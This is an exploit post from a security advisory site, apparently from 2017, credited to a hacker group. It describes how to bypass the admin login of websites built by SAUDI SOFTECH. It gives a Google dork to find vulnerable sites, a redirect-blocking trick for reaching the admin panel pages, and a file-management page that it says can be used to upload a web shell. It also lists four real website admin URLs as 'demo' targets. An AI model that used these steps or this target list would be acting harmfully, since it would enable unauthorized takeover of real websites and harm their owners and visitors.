SAUDI SOFTECH Admin Login Page Bypass | Upload shell access

Published
Credit
Risk
2017.06.15
Ormazd
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:"Designed By: SAUDI SOFTECH (MST)"

##########################
# Exploit Title: SAUDI SOFTECH Admin Login Page Bypass | Upload shell access
# Google Dork : intext:"Designed By: SAUDI SOFTECH (MST)"
# Date:2017-06-14
# Discovered By: Ormazd
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Version: all
# Tested on : Win 10
##########################
## DP ##
Install NoRedirect Plugin to FireFox
Add your target url to NoRedirect plugin and pervent Redirect
than you can use :
target.com/panel/users.php ---> to add or remove or edit user
target.com/panel/pages.php ---> to add or remove or edit pages
target.com/panel/file.php ---> to add or remove or edit files ( you can upload shell :D )
############################


Demo:
http://www.und-ksa.com/panel/
http://www.madicc.org/panel/
http://www.tisco.com.sa/panel/
http://www.speetech.net/panel/
...

#############################

#Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN (mamad khodesh) ||Shdmehr ||

And All Of Iranian Anonymous .

# Discovered By: Ormazd


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com